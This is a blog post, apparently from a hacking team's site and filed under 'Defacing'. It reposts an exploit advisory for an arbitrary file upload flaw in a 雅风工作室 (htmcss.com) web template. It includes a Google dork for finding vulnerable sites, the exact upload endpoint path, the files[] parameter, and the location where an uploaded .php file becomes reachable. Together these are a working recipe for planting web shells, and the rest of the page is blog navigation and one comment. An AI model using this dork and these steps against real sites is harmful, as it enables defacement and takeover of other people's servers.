Home > Defacing > 雅风工作室 - Arbitrary File Upload

雅风工作室 - Arbitrary File Upload

Tuesday, January 09, 2018 Defacing

# Exploit Title: 雅风工作室 - Arbitrary File Upload
# Google Dork: intext:"Htmcss.Com All Rights Reserved"
# Date: 30 December 2017
# Exploit Author: AlHikam0x
# Vendor Homepage: http://www.htmcss.com
# Tested on: Ubuntu

Proof of Concept
1. Check Vulnerability. https://web-target/tpl/plugins/upload9.1.0/server/php/
2. Array type Upload : files[]
3. Check file uploaded. https://web-target/tpl/plugins/upload9.1.0/server/php/files/1234567_.php

1 comment:

icipersJanuary 18, 2018 at 6:06 AM
CRSF nya mana?
ReplyDelete
Replies

Add comment

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )

CowoKerensTeam

Header Ads

雅风工作室 - Arbitrary File Upload

Post a Comment

1 comment:

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts

CowoKerensTeam

Header Ads

雅风工作室 - Arbitrary File Upload

Related Posts

Post a Comment

1 comment:

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts